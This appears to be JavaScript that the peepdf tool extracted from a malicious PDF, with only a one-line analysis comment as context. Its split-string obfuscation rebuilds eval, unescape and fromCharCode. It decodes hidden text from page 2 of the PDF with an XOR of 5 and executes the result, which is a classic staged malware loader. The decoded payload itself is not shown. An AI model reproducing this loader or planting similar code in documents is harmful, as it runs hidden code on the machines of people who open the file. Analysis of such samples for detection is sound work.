// peepdf comment: Javascript code located in object 20 (version 0)

var r = ["un", "es", "pe", "", "ca"];
p = new
String(
r[
0] + r[
1] + r[
4] + r[
2] + r[
3]);

var google = ["cha", "rCo", "", "t", "deA"];
e = new
String(
google[
0] + google[
1] + google[
4] + google[
3] + google[
2]);

var u = ["ageN", "rds", "", "getP", "umWo"];
t = new
String(
u[
3] + u[
0] + u[
4] + u[
1] + u[
2]);

var q = ["", "hWo", "Pag", "eNt", "get", "rd"];
eS = new
String(
q[
4] + q[
2] + q[
3] + q[
1] + q[
5] + q[
0]);

var rC = ["ev", "", "al"];
edit = new
String(
rC[
0] + rC[
2] + rC[
1]);

var d = ["p", "p", "a", ""];
a = new
String(
d[
2] + d[
0] + d[
0] + d[
3]);

var g = ["mCh", "ode", "arC", "fro", ""];
aBasic = new
String(
g[
3] + g[
0] + g[
2] + g[
1] + g[
4]);


var
editN = 2;
var
y = 5;
var
a = this[
a];
var
j = String("ny2%".substr(3));
var
b = new
String();
var
x = this[
t](
editN);
var
bUpdate = this[
p];

for (
var
pI = 0;
pI < x;
pI++) {

    o = this[
    eS](
    editN, pI);
    var
    file = o.
    substr(
    o.
    length - 2, 2);
    var
    w = bUpdate(
    j + file);
    var
    xX = w[
    e](
    0);
    var
    oAlpha = xX ^ y;
    b += String[
    aBasic](
    oAlpha);
}
this[edit](b);

